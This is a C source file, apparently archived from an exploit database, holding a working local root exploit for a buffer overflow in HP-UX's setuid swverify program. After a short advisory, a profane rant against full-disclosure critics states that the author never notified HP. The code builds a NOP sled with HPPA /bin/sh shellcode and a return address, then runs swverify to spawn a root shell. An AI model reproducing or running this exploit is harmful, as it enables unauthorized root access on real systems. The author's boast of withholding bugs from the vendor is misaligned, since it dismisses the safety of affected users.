131 lines
No EOL
5.4 KiB
C
131 lines
No EOL
5.4 KiB
C
// source: https://www.securityfocus.com/bid/3279/info
|
|
|
|
HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems.
|
|
|
|
A problem has been discovered in the operating system that can allow a local user to gain elevated privileges. swverify contains a buffer overflow which is exploitable upon receiving 6039 bytes as an argument. The swverify program is setuid root, which allows a local user to execute code as root, potentially gaining administrative access to the vulnerable system.
|
|
|
|
/*
|
|
|
|
Copyright FOO
|
|
This code may be distributed freely so long as it is kept in its entirety.
|
|
|
|
|
|
http://www.counterpane.com/crypto-gram-0108.html#1
|
|
|
|
"I have long said that the Internet is too complex to secure. One of the
|
|
reasons is that it is too complex to understand."
|
|
|
|
"It's the authors of the worm and its variants, eEye for publicizing the
|
|
vulnerability, and especially Microsoft for selling a product with this
|
|
security problem."
|
|
|
|
Didn't you just say that the Internet is too complex to even understand let
|
|
alone secure? And now it's Microsoft's fault. How should they be able to
|
|
magically know all the answers? Oh, I know, security is a process...
|
|
|
|
"If software companies were held liable for systematic problems in
|
|
its products, just like other industries (remember Firestone tires), we'd
|
|
see a whole lot less of this kind of thing."
|
|
|
|
Yes, I remember Firestone tires. Bridgestone/Firestone Inc. sold people
|
|
a bunch of faulty tires. The wheel is certainly not "too complex to
|
|
understand". After all, we've had 5000 years of R&D time; the public
|
|
expects products that work right. Web servers, on the other hand, are
|
|
a somewhat newer invention. Thanks for the phony analogy, Bruce.
|
|
|
|
|
|
"You can argue that eEye did the right thing by publicizing this
|
|
vulnerability, but I personally am getting a little tired of them adding
|
|
weapons to hackers' arsenals. I support full disclosure and believe that
|
|
it has done a lot to improve security, but eEye is going too far."
|
|
|
|
I could go into the whole full disclosure debate, but I'd honestly rather
|
|
get a root canal. Instead, I'll just point out how wrong you are. How can
|
|
you support full disclosure and not support eEye fully disclosing this issue
|
|
to the public? More importantly, why do you even care? The debate is over,
|
|
full disclosure died when Jeff Moss started blackhat, bugtraq went corporate,
|
|
and @stake bought the scene. The community at large has already rejected
|
|
full disclosure. Anyone who thinks otherwise is naive. In reality the so
|
|
called blackhats find most of the holes and only share them with their
|
|
friends. Everyone can argue the pros and cons of full disclosure and try
|
|
to start up hopeless little private 0 day clubs for vendors and "authorized"
|
|
researchers until hell freezes over, or Microsoft releases a quality product.
|
|
In the end, it's just a bunch of people who don't know, arguing with the
|
|
bunch who don't get it. Blame eEye and Microsoft all you want if it makes
|
|
you feel better. If you bitch at them long enough they might just join the
|
|
rest of the real researchers out there who don't do public disclosure and
|
|
only report to known and trusted peers. (read: other blackhats)
|
|
|
|
The real problem here is that the clueless have convinced themselves that the
|
|
computer security underground is nothing more than packs of socially
|
|
challenged adolescent boys running around with proof of concept exploit code
|
|
written by whitehats. Some have even deluded themselves into thinking that
|
|
they should be the ones who are the gate keepers of vulnerability info.
|
|
(Russ Cooper comes to mind.) Congratulations, the war is over. You won. The
|
|
public is now either defenseless or paying by the hour.
|
|
|
|
Don't bite the hand that feeds you or you won't get any more scraps from
|
|
the table.
|
|
|
|
I will leave you with this HPUX 11 local root exploit code. /usr/sbin/sw*
|
|
are all setuid root by default and all contain buffer overflows. I didn't
|
|
bother notifying HP about this at all. I just don't give a fuck.
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
|
|
#define BUF_LENGTH 10102
|
|
#define STACK_OFFSET 0
|
|
#define EXTRA 4000
|
|
#define HPPA_NOP 0x3902800b //0x0b390280
|
|
|
|
u_char hppa_shellcode[] =
|
|
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
|
|
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
|
|
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff\xff\xff";
|
|
|
|
u_long get_sp(void)
|
|
{
|
|
__asm__("copy %sp,%ret0 \n");
|
|
}
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
char buf[BUF_LENGTH+8];
|
|
unsigned long targ_addr,other_addr;
|
|
u_long *long_p;
|
|
u_char *char_p;
|
|
int i, code_length = strlen(hppa_shellcode),dso=STACK_OFFSET,xtra=EXTRA;
|
|
|
|
if(argc > 1) dso+=atoi(argv[1]);
|
|
if(argc > 2) xtra+=atoi(argv[2]);
|
|
|
|
long_p = (u_long *) buf;
|
|
|
|
for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++)
|
|
*long_p++ = HPPA_NOP;
|
|
|
|
char_p = (u_char *) long_p;
|
|
|
|
for (i = 0; i < code_length; i++)
|
|
*char_p++ = hppa_shellcode[i];
|
|
|
|
targ_addr = get_sp() - dso;
|
|
|
|
for (i = 0; i < xtra /4; i++)
|
|
{
|
|
*char_p++ =(targ_addr>>24)&255;
|
|
*char_p++ =(targ_addr>>16)&255;
|
|
*char_p++ =(targ_addr>>8)&255;
|
|
*char_p++ =(targ_addr)&255;
|
|
}
|
|
|
|
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",targ_addr,strlen(buf), xtra,dso);
|
|
execl("/usr/sbin/swverify","swverify", buf,(char *) 0);
|
|
perror("execl failed");
|
|
return(-1);
|
|
} |